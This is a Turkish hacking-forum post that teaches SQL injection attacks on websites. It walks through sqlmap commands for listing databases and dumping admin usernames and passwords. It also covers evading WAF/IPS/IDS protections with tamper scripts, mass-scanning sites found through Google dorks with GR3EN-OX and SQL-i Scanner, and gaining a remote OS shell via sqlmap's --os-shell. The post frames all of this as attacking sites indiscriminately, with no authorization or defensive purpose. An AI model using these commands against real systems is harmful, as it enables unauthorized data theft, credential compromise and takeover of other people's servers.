Neler yeni

Data Exploitation // SQL Exploitleme (1 Viewer)

Mesajlar
107
Credits
0
SQL AÇIĞI EXPLOİTLEME


Bilgileri çekmek için bir çok program kullanabilirsiz tabi ama ben bir kaçına değineceğim.

  • SQL Map ---------------------------// Arayüz desteği yok. Çok geniş parametreleri var.
  • Havij -------------------------------// Hızlı ve kolay kullanım
  • Sql-i Scanner----------------------// Toplu bir şekilde test et
  • Grennox -------------------------- // Bonus



1-) SQLMAP

Daha yavaş ama kesin çözümler arıyorsanız tam sizlik. Python dili ile yazılmıştır. Komut satırında çalışır. Sistem ortam değişkenlerine pythonu eklemelisiniz. Eklemezseniz cmd üzerinde python çalışmayacaktır.
Programı masaüstünde düşünerek bu kodları yazıyorum.



Masaüstüne geçelim
Kod:
cd Desktop


Klasöre girelim.
Kod:
cd sqlmap


programı python ile çalıştıralım.
Kod:
python sqlmap.py


Bu kısma kadar programımızı açtık. Şimdi uzatmadan komutları sizlerle paylaşıcam.



Kod:
python sqlmap.py -u xxx.com/index.php?id=2 --dbs                     [Dataları listeler. ]


python sqlmap.py -u xxx.com/index.php?id=2 -D data1 --tables               [Seçilen datadaki tabloları listeler.]

python sqlmap.py -u xxx.com/index.php?id=2 -D data1 -T tablo1 --columns      [Seçilen tablonun kolonlarını listeler]


python sqlmap.py -u xxx.com/index.php?id=2 -D data1 -T tablo1 -C admin_user,admin_pass --dump       [Kolondaki seçilen bilgileri alır.]



SQL İNJ Waff Bypass(Güvenlik atlatma yetkilendirme)

Buraya kadar bilgileri almayı öğrendik. Bağlı olduğumuz veri tabanı kullanıcısının gerekli izinlere sahip olması gerekir. Bunların kontrolünü sağlamada kullanabileceğimiz birkaç parametre mevcut. Veri tabanı kullanıcılarını öğrenebilmek için --users parametresini, kullanıcıların parolaları için --passwords parametresini, kullanıcı yetkileri için --privileges parametresini ve kullanıcı rolleri için ise --roles parametresini kullanabiliriz. Aksi takdirde;
Bağlantı kopma sorunu gibi problemlerle karşılaşırız böylece güvenlik yazılımlarının azizliğine uğramış oluruz.
Hadi bunların önüne geçelim.


Level ve risk seviyesini arttırabilirsiniz.Söz konusu parametreler sqlmap’in hangi testleri yapacağını belirtir. Ön tanımlı olarak --level parametresi 1 olarak gelir ve 1-5 arası değer alabilir. --risk parametresinin varsayılan değeri 1’dir ve 1-3 arası değer alabilir.

Kod:
sqlmap -u http://xxx.com/index.php?id=2 --risk=3 --level=3 --dbms=mysql --is-dba --users --privileges --roles

[11:36:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:36:30] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
Gibi ekrana görüntüler geliyorsa. Waff/IPS/IDS bypass işlemi başlatmalıyız.
Kod:
sqlmap -u "http://example.com/main.php?id=test" --tamper="space2mysqlblank.py" --dbs
Manuel olarak daha ayrıntılı bir WAF testi yapmak için --identify-waf parametresinden yararlanabiliriz.
SQLmap klasöründe bir sürü tamper var. Açıkcası bende hepsini bilmiyorum.


Risk ve level değerlerini artırdığınızda yapılan testlerin sayısı artar. Bu testleri bir nebze olsun hızlandırabilmek için --threads parametresini kullanırız. Bu parametreyle eş zamanlı bağlantı sayısını değiştirmemiz mümkün. Varsayılan değeri 1 iken daha fazla payload’un eş zamanlı olarak test edilmesini sağlamak için 10 değerini verebiliriz. Ek olarak --eta parametresiyle, yapılan işlemler için tahmini bitiş süresi bir progress satırı şeklinde ekrana yansıtılmaktadır.


SQLMAP ile sadece get değil post işlemleri de yapmak mümkün.

Ayriyetten bir txt dosyasındaki siteleride sırayla taratabiliriz. Sqlmap’in -m parametresiyle birden fazla URL’in taratılması mümkündür. Örneğin aşağıdaki gibi bir içeriğe sahip linkler.txt dosyasında bulunan URL’ler sqlmap ile taratılabilir text doyamız böyle olsun;
-------------------------------------------------------------
xx.com/index.php?id=2 l
bacıkırbaçlıyan.org/fetiş.php?id=3 l
kudurdum.com/pages.php?id=65 l
-------------------------------------------------------------

Kod:
sqlmap -m "C:\Users\tokikolik\Desktop\siteler.txt"

Kodu ile taratabiliriz. Arkadaşlar konu düşündüğümden uzun oldu. Bilmediğim ve anlatamayacağımı düşündüğüm yerleri alıntıladım. Tanımlar vs. özellikle ---batch ile başlayan parametreler.



Kod:
--batch: Bu parametre ile sqlmap’in sorduğu sorulara otomatik olarak varsayılan cevabı vermiş oluruz.
--answer: --answer="quit=N,follow=N" gibi bir kullanımla söz konusu sorularla karşılaşıldığında otomatik olarak istediğimiz cevapların verilmesini istedik.
--mobile: Mobil bir hedefe yaptığımız saldırı, hedef tarafından uygun User-Agent’ı bulundurmadığımız için engellenebilir. Bu parametreyle sqlmap testlerini bir mobil client gibi tanıtıyoruz.
-v: Varsayılan değeri 1’dir. 0-6 arası değer verebiliriz. Bu parametre ile testler sırasında oluşan logları sqlmap ekranın görmemiz mümkün hale geliyor.
-t: Tüm HTTP trafiğini ekrana yansıtmak yerine belirlediğimiz bir metin dosyasına aktarır.
--force-ssl: HTTPS isteği yaparken bu parametreyi kullanabilirsiniz. Alternatif olarak Host adresinin sonuna 443 port numarası da eklenebilir.
--version: Mevcut sqlmap sürümünü ekrana yansıtır.
--update: Sqlmap’i otomatik olarak günceller. Windows sistemlerde çalışmamaktadır. Güncellemeyi manuel olarak yapmak gerekir.



SQL İnj Combine Attack


Mass sql gibi topluca hadım edicez siteleri. Bugün anlatıcaklarım 3 adet programın birlikte kullanılmasını anlatıyor. Bu programları kullandığımda daha fazla verim aldığım için paylaşıyorum . Bu programları böyle koordineli kullanan var mı varsa da paylaşan var mı bilmiyorum.


GR3EN-OX Exploit Scanner








Dork kısmına sql dorklarımızı yazıyoruz. Search a basıyoruz. O dorku taratıyor. Ardından starta basıyorsunuz.
Teker teker siteleri denemeye başlıyo. Ardından save to file diyip bir yere kaydediyoruz. Bazı sitelerde açık olmasa bile açık varmış gibi gösteriyor. Bu sebeple ikinci programa geçelim.



SQL-I SCANNER Master




10 siteden 8 inde bırakın waff bypass aşamasını level risk seviyesiyle bile uğraşmayacaksınız.

Kod:
cd desktop  -----> Masaüstüne geçiş yaptım.
cd Sqli-scanner-master ---------> Programın kurulu olduğu dosyaya giriş yaptım.
python sqliscanner.py -------> programı çalıştırıyoruz.
python sqliscanner.py  --file [grennox.txt dizin adresi] --output [sonuçların adresi.txt]  -------> Tarama kodu.


Artık süzme işlemleri bitti.Artık sqli dumper, sqlmap, sqlite, havij ... aklınıza ne geliyosa kullanabilirsiniz. Bizim amacımız hızlı dump almak olacağı için benim tercihim havij.


SQLMAP OS-SHELL UPLOAD

Hedefin sql yapısına girmeden shell upload edebilirsiniz. Bunun anlatılcak başka bir tarafı yok.

Kod:
sqlmap -u "site.com/item.php?id=" --current-user --is-dba

Eğer çıktıda current user True dönerse yükleyebilirsiniz demek.

Kod:
sqlmap -u "site.com/item.php?id=" --os-shell

Zaten size sitenin yazıldığı dili soruyor. Girdikten sonrada upload edebileceğiniz bir link veriyor.
 

Bu konuyu görüntüleyen kullanıcılar